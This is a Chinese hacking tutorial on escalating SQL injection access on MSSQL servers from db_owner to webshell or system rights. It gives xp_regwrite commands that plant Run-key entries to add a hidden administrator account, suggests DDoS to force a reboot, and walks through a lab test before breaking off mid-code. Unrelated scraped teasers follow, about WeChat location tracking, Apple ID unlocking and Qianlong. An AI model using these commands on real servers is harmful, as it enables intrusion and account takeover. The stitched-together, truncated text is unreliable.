声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。 考虑再三,偶还是决定发出来。此招手段歹毒,利用范围广泛,可以说是只要是有sql注射漏洞的网站,只要运用此法99%可以拿到webshell甚至系统权限(不敢 把话说满,呵呵,经本人数百次真实“实战演习”,基本上是100%可以拿到webshell甚至系统权限)。 记得我在《MSSQL db_owner角色注入直接获得系统权限(续)》中写过一种利用xp_regwrite来取得系统权限的 *** : xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\currentvers ion\run’,’x wq1’,’REG_SZ’,’net user xwq xwq /add’ xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\currentvers ion\run’,’x wq2’,’REG_SZ’,’net localgroup administrators xwq /add’,只要让网站所在 的服务器重起,就能得到系统权限。经过本人的数百次的真实实验,这种 *** 不 太实用,很容易引起网管的注意,再说ddos也是违法的事(偶可是好人啊),发 动一场ddos要花费的大量的人力,物力(看你的肉鸡多少拉)。所以不太可行( 除非是你十分想要搞定的网站)。 呵呵,哆嗦拉那么多,你可能看的已经不耐烦拉,好,这就介绍我的三大 必杀技之一————万能提权。 假如一个网站存在sql注射漏洞,如果这个网站是用固定服务器sysadmin权 限的用户作的连接(呵呵,通俗点说就是sa,菜鸟可以这样认为),呵呵,想要拿 到一个webshell或者是系统权限可以说是易如反掌,轻而易举的事,据我所知, sysadmin权限要拿到webshell或者系统权限不下10种,呵呵,可能更多吧(偶只 会10种),sysadmin怎么拿到webshell或者系统权限,我不想多说,想比大家都 已经烂熟于心拉,可是要是一个网站是db_owner权限呢?你怎么办,你怎么拿系 统权限,怎么拿webshell(没有上传漏洞和数据库备份等功能),大家可能回说 backup a shell,我记得LCX也在《MSSQL db_owner角色注入直接获得系统权限》 里说过拉“备份得到的shell只是理论化的东东,如果一个webshell有20mb的话, 你还能用它吗?”呵呵,要是我告诉你db_owner拿到一个webshell或者是系统权 限的 *** 和sysadmin权限的一样多,你回有什么反映,是不是觉得有点不可思议 ,或者又是我胡说呢?(不相信的朋友,下面的内容就不要看拉) 呵呵,是不是看的心痒痒拉,迫不及待的想知道啊,好,我不在废话拉,这 就把我的三大必杀技之一————万能提升权限 *** 告诉大家。 在告诉大家之前,我们先做个实验 实验环境windowsxp sp1+SQL 2000 sp3,大家跟着我来step to step,首先新 建一个具有db_owner的权限的用户,这里我是xwq(就是在服务器角色里面什么都 不要选,在数据库角色里面钩上db_owner),好,现在我们打开查询分析器用xwq 连上后再里面输入sp_addlogin xuwenqiang,执行看看,出现拉什么? 服务器: 消息 2571,级别 14,状态 2,过程 sp_addlogin,行 16 用户 ’xwq’ 没有运行 DBCC auditevent 的权限。 服务器: 消息 15247,级别 16,状态 1,过程 sp_addlogin,行 17 用户没有执行此操作的权限。 呵呵,出现上面的错误信息这很正常,因为只有sysadmin 和 securityadmin 固 定服务器角色的成员才可以执行 sp_addlogin,那么怎么才好让sp_addlogin为我 所用呢?我们在这里看一下sp_addlogin的代码: create procedure sp_addlogin @loginame sysname ,@passwd sysname = Null ,@defdb ; ; sysname = ’master’ -- UNDONE: DEFAULT CONFIGURABLE??? ,@deflanguage sysname = Null ,@sid varbinary(16) = Null ,@encryptopt varchar(20) = Null end ELSE begin dbcc auditev
黑客教你定位微信地址黑客位置微信位置教程分手后想要救你的前男友,一个重要的步骤就是吸引他男朋友的注意;黑客教你定位微信地址1.首先,玩怀旧牌你们可以适当地约会,也可以有意或无意地在你的前一次追悼会上或...
本文导读目录: 1、解锁苹果id密码的方法 2、苹果手机id忘记了怎么办才能解开 3、黑客是怎么解苹果id 4、黑客怎样解苹果id锁/黑客怎样解苹果id锁 5、苹果手机的id被黑客锁了...
先聊一下乾隆为什么能当太上皇,原因很简单,因为他在活着的时候把皇位禅让给自己的儿子了,那么问题来了,乾隆这是作的什么妖,好端端的为什么把皇位还给送人了,这在历史上也是极为罕见的事儿,这话儿可要从乾隆刚...
现在微信APP在很多小伙伴的日常生活中已经应用很广了,但是在我们日常生活当中还是有一些微信上的小应用搞不定。虽然说那些新奇小应用是搞不了了,但是小编相信很多宝贝们对于扫一扫支付已经吃透了,不过接下...
在如今这一社会发展,手机上早已是变成了大家日常生活之中的必不可少商品之一,乃至现在有的小伙伴们行走吃饭睡觉都务必拿手机上一会。但一些客户针对手机上的基本要素還是不太掌握的。就例如有的客户就不清楚手机截...
本文导读目录: 1、黑客入侵了我的手机? 2、手机被黑客入侵,总有人远程操作我的手机,怎么办? 3、手机被黑客入侵怎么在网上报警 4、手机被苹果手机被黑客入侵通讯录视频怎么办 5、苹果...